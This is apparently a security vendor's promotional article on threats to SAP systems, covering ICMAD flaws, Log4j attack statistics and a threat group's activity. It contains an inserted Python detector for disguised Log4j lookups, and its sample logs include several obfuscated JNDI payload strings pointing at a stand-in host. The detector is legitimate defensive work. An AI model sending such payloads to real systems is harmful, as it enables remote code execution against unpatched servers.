Business-critical applications like SAP are the lifeblood of an enterprise. Considering 77% of the world’s transactional revenue touches an SAP system and 92% of the Forbes Global 2000 uses SAP, an orchestrated and successful attack on unprotected SAP systems could have far-reaching consequences. As the threat landscape continues to evolve, there’s a hole in your defense-in-depth security models - the application layer. Traditionally, security and IT teams believed these applications to be “safe” from threat actors as they were on-premises, behind network protection, and out of reach for attackers. That is no longer the case. As evidenced by threat intelligence from SAP and The Onapsis Research Labs, threat actors are increasingly targeting the application layer directly. These cybercriminals have the motivation, means, and expertise to identify and exploit unprotected business-critical SAP applications — and are actively doing so.
What's at risk?
Compliance, critical business operations, revenue, and more… Attackers with access to an unprotected SAP system can steal personally identifiable information (PII) from employees, customers, and suppliers; access financial records; deploy ransomware; and disrupt critical business processes such as supply chain management. For organizations that must meet regulatory compliance mandates, such an incident can lead to expensive third-party audits and penalties, including fines and legal action. Given that SAP software is used by more than 400,000 organizations globally, the need for security specific to the application layer is vital.
In a recent SAPinsider report, a third of participants said that they have suffered from some sort of credential compromise, malware, or cybersecurity attack that has impacted their SAP environment. And, while some were able to restore business as usual in less than a day, for over 60% it took a week or more to get back up and running. For many organizations, downtime of their SAP systems can cost up to tens of thousands in revenue per hour. Imagine the revenue loss if those SAP systems were offline for a week or more.
In the last few months, we have seen the impact of successful attacks first-hand, and the associated commercial and professional consequences have never been greater.
ICMAD Vulnerabilities in SAP Applications
Onapsis and SAP partnered on the discovery and mitigation of a set of three vulnerabilities affecting the SAP Internet Communication Manager (ICM) component in SAP business-critical applications. These vulnerabilities require immediate attention by most SAP customers. One of the vulnerabilities, CVE-2022-22536, received the highest possible risk score, a 10 out of 10. As a result, CISA has issued a Current Activity Alert. If exploited, these vulnerabilities enable attackers to execute serious malicious activities against SAP users, business information, and processes — and ultimately compromise unpatched SAP applications.
Onapsis Research Labs’ threat intelligence cloud worked to understand the impact of the Log4j vulnerability on some of the most widely used SAP products. While we did not see any exploitation activity directly targeting SAP systems, we observed:
- 9,600+ attacks and more than 200 variants
- 400+ unique hosts attempting to exploit the Log4j vulnerability on our cloud
- Threat actors’ attempts to bypass firewalls include using base64 encoding, mixing uppercase and lowercase letters, and leveraging other obfuscation in order to evade string matching
- Post-exploitation attempts have involved installing crypto miners and stealing AWS secrets
The threat of Log4j is very real and very dangerous, and all organizations should identify vulnerable software and systems and take immediate action to mitigate or patch the Log4j vulnerability.
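The evasions listed above (mixed case, nested lookups, URL and base64 encoding) all defeat a naive literal string match. The following is an added example, not code from Onapsis or SAP, showing how a detection rule can normalize a request before matching so those evasions no longer hide the lookup. The log lines are constructed for the example (RFC 5737 test addresses), and the normalization steps are assumptions about what a log pipeline or WAF rule would do, not a description of the Onapsis product.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample log lines (not real data). The first two are benign;
# the rest carry the same lookup disguised with the evasions described above.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET /docs/jndi-guide.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.9/a}"',
    # mixed upper/lower case to defeat a case-sensitive literal match
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${JnDi:LdAp://203.0.113.9/a}"',
    # nested lower/upper lookups that only spell "jndi" after expansion
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:ldap://203.0.113.9/a}"',
    # default-value lookup syntax used the same way
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "${${::-j}ndi:rmi://203.0.113.9/a}"',
    # URL-encoded in a query parameter
    '10.0.0.11 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 200 "curl"',
    # base64-encoded in a query parameter (encoded here so the sample is exact)
    '10.0.0.12 - - "GET /?d='
    + base64.b64encode(b"${jndi:ldap://203.0.113.9/a}").decode()
    + ' HTTP/1.1" 200 "curl"',
]

# Innermost ${lower:x}, ${upper:x} and ${::-x} lookups; each resolves to x.
LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{::-([^${}]*)\}", re.IGNORECASE)
# Candidate base64 tokens worth trying to decode (16+ chars of the alphabet).
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def url_decode(s, max_rounds=3):
    """Percent-decode repeatedly, bounded so double/triple encoding is handled."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def collapse_lookups(s):
    """Replace nested lookups from the inside out until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = LOOKUP_RE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s


def expansions(s):
    """Yield the string itself plus the decoding of any base64-looking token."""
    yield s
    for tok in B64_TOKEN_RE.findall(s):
        try:
            yield base64.b64decode(tok, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not base64, skip
            continue


def is_jndi_lookup(line):
    """True if, after normalization, the line contains a ${jndi: lookup."""
    decoded = url_decode(line)
    for candidate in expansions(decoded):
        if "${jndi:" in collapse_lookups(candidate).lower():
            return True
    return False


def scan(lines):
    """Return the log lines that carry a (possibly disguised) JNDI lookup."""
    return [ln for ln in lines if is_jndi_lookup(ln)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print("ALERT:", hit)
```

The order matters: percent-decoding comes first so that encoded `${` sequences become visible, base64 candidates are decoded before lowercasing (lowercasing would corrupt the base64 alphabet), and lookups are collapsed before the final match. The literal `jndi` in a benign path is not flagged because the match is on the lookup syntax `${jndi:`, not on the word alone.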
Almost every day, we see yet another case of ransomware, with recent news cycles revolving around debilitating attacks on business-critical systems of large enterprises—from fuel and energy companies to food processing companies. It’s not that these enterprises haven’t taken steps to protect these assets; it’s just that the “traditional” way of preparing for and responding to ransomware doesn’t address the application layer. Vulnerabilities such as 10KBLAZE, PayDay, and RECON allow threat actors to take full control of applications through the application layer itself. These threat actors go straight to the application and, once in, move down to the operating system level from there. Onapsis has observed that new, unprotected SAP applications provisioned in IaaS environments were discovered by threat actors and attacked in less than 3 hours, with 400+ successful exploitations observed. In this whitepaper, SAP and Onapsis outline several key steps organizations can take to minimize the risk of an attack on their business-critical SAP applications.
In January 2022, Sygnia’s Incident Response team released a report detailing the activities of a threat group, Elephant Beetle, that resulted in the theft of millions of dollars from Latin American financial sector organizations. Onapsis Research Labs’ Threat Intelligence Cloud analyzed activity related to two SAP NetWeaver Java vulnerabilities mentioned in the Sygnia report. They found over 350 exploitation attempts since January 2020, and that the vast majority of Onapsis-observed exploit attempts come from Asia and the US, indicating threat groups are leveraging these vulnerabilities on a global scale.
It’s clear the attackers aren’t waiting, so why are you?
A breach of any of these systems can have a critical impact on your business. The right application-based vulnerability management solution can provide organizations with deep visibility into the application landscape, automate assessments, and reduce remediation times for teams to achieve a greater risk reduction with less effort. Now is the time to protect your SAP systems; see how Onapsis can help.